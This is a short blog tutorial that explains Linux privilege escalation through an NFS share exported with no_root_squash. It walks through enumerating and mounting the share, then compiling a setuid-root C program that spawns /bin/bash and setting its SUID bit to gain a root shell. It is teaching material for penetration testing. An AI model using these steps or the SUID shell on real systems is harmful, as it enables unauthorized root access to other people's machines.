NFS - Linux Privilege Escalation

Nguyen Nguyen included in Penetration Testing

2023-06-28 659 words 4 minutes

Contents

Note: If you need to zoom in, you can click on the image.

Background Information on NFS

NFS stand for Network File System. NFS allows remote hosts to mount file systems over a network and interact with those file systems as though they are mounted locally.

Analogy for NFS: Imagine you are a user sitting in a library (client computer) and you want to read a book that is located on a shelf in a different building (server). Instead of physically going to the other building and retrieving the book, you can request the librarian (NFS protocol) to bring the book to you. The librarian acts as an intermediary, facilitating the retrieval of the book from the remote location and making it accessible to you locally.

NFS configuration setting is stored in: cat /etc/exports and it important to note that this file can be read by anyone.

Exploiting NFS

The first thing we have to do is look at the NFS configuration to see what directories are shared then we narrow down our choices by looking for no_root_squash.

What is no_root_squash? no_root_squash allows a remote root user on a remote client to retain their superuser privilege when accessing the shared files. Additionally no_root_squash disable “root squashing” .

Then what is root squashing? Root squashing prevent a remote root user to retain their superuser privilege. Basically, they are treated as a user. Let say you are a celebrity, but in your parent eyes your just their kid and they treat you just like how they treated you when you were born. That what root squashing is like.
Now that we found a shared directory that has no_root_squash. We need to enumerate (gather information) on what shares are mountable. To do this we can use this command: showmount -e TARGET_IP.

For this explanation, I will pick the /tmp directory to mount to. Now, let create a folder in the /tmp directory in our attacker machine.

Now we will mount one of the shares from the target to the directory we just created. I'm going use this command: `mount -o rw TARGET_IP:/SHARE_NAME /FOLDER_TO_MOUNT_IT`. I'm going choose the /tmp file. My command would be `mount -o rw 10.10.149.95:/tmp /tmp/ATTACK_MACHINE`.

Now, let's go inside the ATTACK_MACHINE folder. To test if the folder is really mounted together (shared together). We can create a file name new and see if it appears on our victim machine. To do this we are going use the touch command: `touch new.c`. As you can see from the picture, both directory are in sync.

Now, that our two directory are in sync. Time to do the evil stuff :) We will edit our new file from our "Attacker Machine" and put the following lines:

1
2
3
4
5
6


int main()
{ setgid(0);
  setuid(0);
  system("/bin/bash");
  return 0;
}

Note: Please make sure that new has the c extension. So it would be new.c
Now, we’re cooking. Now let’s compile our code using gcc new.c -o new -w then assign it a SUID bit. Let’s review what a SUID bit shall we?

SUID bit

SUID bit is denoted as “s”. It also known as Set owner User ID. SUID the user to inherit the power of the owner of the file. For example, if the owner of the file is root, the user will get root privilege. If the owner of the file is a specific user, then the user will get the privilege of that specific user.

Back to the Program

Now that we review what a SUID bit is let’s continue where we started. The next thing we are going to do is assign suid to new. To do that we are going use this command: chmod u+s new. If you do ls -al again, you will see the suid bit assign to new.

Now, let's go back to our target machine and run new.

There you go, we got root privilege.

That’s all, thank you for reading.